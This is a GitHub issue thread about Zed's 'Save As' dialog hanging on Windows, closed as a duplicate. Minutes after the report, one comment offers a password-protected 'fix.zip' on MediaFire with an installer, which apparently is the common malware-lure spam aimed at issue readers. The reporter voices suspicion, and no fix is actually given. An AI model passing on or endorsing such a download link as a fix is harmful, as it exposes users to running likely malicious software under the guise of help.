### ISSUE TITLE
Can't do “save as”

### ISSUE THREAD

**Issue by BeadiestStar64** [zed-industries/zed#16853] opened 2024-08-26 05:28 UTC
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

In my environment, when I try to “save as” in zed, the standard Windows Explorer window is launched by zed.
However, that window eventually becomes unresponsive and I am unable to save the “file created by zed”.
This is limited to “Save As” only.
Oddly enough, the problem does not occur when saving a file created in another application.

### Environment

Zed: v0.149.5 (Zed)
OS: Windows 10.0.22631
Memory: 31.9 GiB
Architecture: x86_64
GPU: NVIDIA GeForce RTX 3080 Ti || NVIDIA || 552.22

### If applicable, attach your Zed.log file to this issue.

<details><summary>Zed.log</summary><pre>

</pre></details>

**Comment by swaggy111** [comment] 2024-08-26 05:28
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BeadiestStar64** [comment] 2024-08-26 06:19
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

I have a feeling that your file is malicious.🤔

**Comment by Huliiiiii** [comment] 2024-08-26 09:28
dupe of #12410

**Closed** 2024-08-26 13:39 UTC
Labels: defect, triage, admin read
